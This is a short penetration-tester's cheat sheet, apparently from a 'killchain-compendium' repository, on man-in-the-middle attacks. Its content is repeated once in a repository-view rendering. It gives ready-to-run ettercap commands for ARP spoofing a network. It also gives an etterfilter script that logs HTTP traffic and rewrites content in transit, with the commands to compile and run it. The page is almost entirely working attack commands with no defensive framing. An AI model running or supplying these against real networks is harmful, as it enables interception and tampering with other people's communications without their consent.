killchain-compendium/Post Exploitation/Man in the Middle.md

# Man In the Middle

* [Ettercap](https://www.ettercap-project.org/)
* [Bettercap](https://www.bettercap.org/)

* ARP spoofing via ettercap and read traffic. Press q to reverse to pre mitm arp caches
```sh
ettercap -T -i <interface> -M arp
```

* Etterfilter can filter and restructure packets
```sh
man etterfilter
```
```sh
if (ip.proto == TCP && tcp.dst == 80 && search(DATA.data, "filename.html") ) {
    log(DATA.data, "/tmp/ettercap.log");
    replace("filename.html", "otherfilename.html" );
    msg("###### ETTERFILTER: substituted 'filename.html' with 'otherfilename.html' ######\n");
}
```
* Escape double quote inside the payload string
* compile via 
```sh
etterfilter filter.ef -o filter.ef
```

* Run the filter via
```sh
ettercap -T -i <interface> -M arp -F filter.ef
```
restructured Post Exploitation 2022-11-11 01:15:07 +01:00			`# Man In the Middle`

			`* [Ettercap](https://www.ettercap-project.org/)`
			`* [Bettercap](https://www.bettercap.org/)`

			`* ARP spoofing via ettercap and read traffic. Press q to reverse to pre mitm arp caches`
			```sh
			`ettercap -T -i <interface> -M arp`
			```

			`* Etterfilter can filter and restructure packets`
			```sh
			`man etterfilter`
			```
			```sh
			`if (ip.proto == TCP && tcp.dst == 80 && search(DATA.data, "filename.html") ) {`
			`log(DATA.data, "/tmp/ettercap.log");`
			`replace("filename.html", "otherfilename.html" );`
			`msg("###### ETTERFILTER: substituted 'filename.html' with 'otherfilename.html' ######\n");`
			`}`
			```
			`* Escape double quote inside the payload string`
			`* compile via`
			```sh
			`etterfilter filter.ef -o filter.ef`
			```

			`* Run the filter via`
			```sh
			`ettercap -T -i <interface> -M arp -F filter.ef`
			```